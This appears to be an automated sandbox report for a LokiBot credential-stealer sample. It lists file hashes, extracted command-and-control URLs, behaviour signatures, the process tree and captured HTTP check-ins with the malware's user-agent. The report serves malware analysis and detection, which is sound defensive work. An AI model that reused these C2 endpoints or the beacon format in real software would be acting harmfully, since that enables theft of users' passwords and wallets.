Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

dridex

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    25/01/2022, 10:08 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe

  • Size

    243KB

  • MD5

    16f716620dd5c0151f14e9972ceece41

  • SHA1

    3769c9137ba48a84d40988d7ced98a61f3825c9b

  • SHA256

    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84

  • SHA512

    cc01211f6bc71bfbf8de21f3a04b0944cc7be82dfdacaa0b47ac564f686ed7a4c28888e23d68feadb196d4a856cda06683b79a33f92cb38b1d9ed72903f622aa

Score
10/10
lokibotcollectionspywarestealersuricatatrojan

Malware Config

Extracted

Family

lokibot

C2

http://augmentinprod.ir/jin/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • suricata: ET MALWARE LokiBot Checkin

    suricata: ET MALWARE LokiBot Checkin

    suricata
  • suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)

    suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)

    suricata
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    "C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
      "C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:852

Network

  • flag-us
    DNS
    augmentinprod.ir
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address:
    8.8.8.8:53
    Request
    augmentinprod.ir
    IN A
    Response
    augmentinprod.ir
    IN A
    172.67.131.97
    augmentinprod.ir
    IN A
    104.21.3.248
  • flag-us
    POST
    http://augmentinprod.ir/jin/five/fre.php
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address:
    172.67.131.97:80
    Request
    POST /jin/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: augmentinprod.ir
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B94F9B44
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 200 OK
    Date: Tue, 25 Jan 2022 10:09:01 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2P%2Bt%2FHSj746Oqc7HlqbCbRx%2BMcTB1OaLuDFo9BshAbUqr0w5hzVvfVH2Hl8ct0Z%2BOr3iifyXqmhUwSmA0YCPkZb99U1U7WL8r8pJeHe4%2FfRxhrnzaZ4Z5RzNfFUrfHbsa0%2Fm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6d30b41fde474089-LHR
  • flag-us
    POST
    http://augmentinprod.ir/jin/five/fre.php
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address:
    172.67.131.97:80
    Request
    POST /jin/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: augmentinprod.ir
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B94F9B44
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 200 OK
    Date: Tue, 25 Jan 2022 10:09:01 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bODpgMpRhE3ksmKcoIp5B5l6x50B1AvxktMMoIKW%2FTRbzNtlzcLgoT6x4CJAdjNCXAj8Hq6TIF86FzoHV4bC1zJAeaUJLHGP8G5k1nx5fcrt5ZBqvqsK9DI6YGPEqvdRo0B0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6d30b4210d860081-LHR
  • flag-us
    POST
    http://augmentinprod.ir/jin/five/fre.php
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address:
    172.67.131.97:80
    Request
    POST /jin/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: augmentinprod.ir
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B94F9B44
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 200 OK
    Date: Tue, 25 Jan 2022 10:09:01 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N4Z5kigCuZ%2BG8rS0mtDPwQ05iEIAO%2FexkvDhusmsho11EcEnIvs19fSQkkf3CVIsZOmvdJExK7IbE9OFab0gLSAR3xxgLF1IfB%2BKp5SRqNPf4iNeRi6BbB80F9Xph6Q4hZpb"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6d30b421dee57168-DUS
  • 209.197.3.8:80
    46 B
     40 B
     1
    1
  • 172.67.131.97:80
    http://augmentinprod.ir/jin/five/fre.php
    http
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    1.1kB
     5.2kB
     10
    9

    HTTP Request

    POST http://augmentinprod.ir/jin/five/fre.php

    HTTP Response

    200
  • 172.67.131.97:80
    http://augmentinprod.ir/jin/five/fre.php
    http
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    741 B
     5.2kB
     7
    8

    HTTP Request

    POST http://augmentinprod.ir/jin/five/fre.php

    HTTP Response

    200
  • 172.67.131.97:80
    http://augmentinprod.ir/jin/five/fre.php
    http
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    760 B
     5.2kB
     8
    8

    HTTP Request

    POST http://augmentinprod.ir/jin/five/fre.php

    HTTP Response

    200
  • 8.8.8.8:53
    augmentinprod.ir
    dns
    f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    62 B
     94 B
     1
    1

    DNS Request

    augmentinprod.ir

    DNS Response

    172.67.131.97
    104.21.3.248

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/852-119-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/852-121-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2312-120-0x0000000002460000-0x0000000002464000-memory.dmp

    Filesize

    16KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.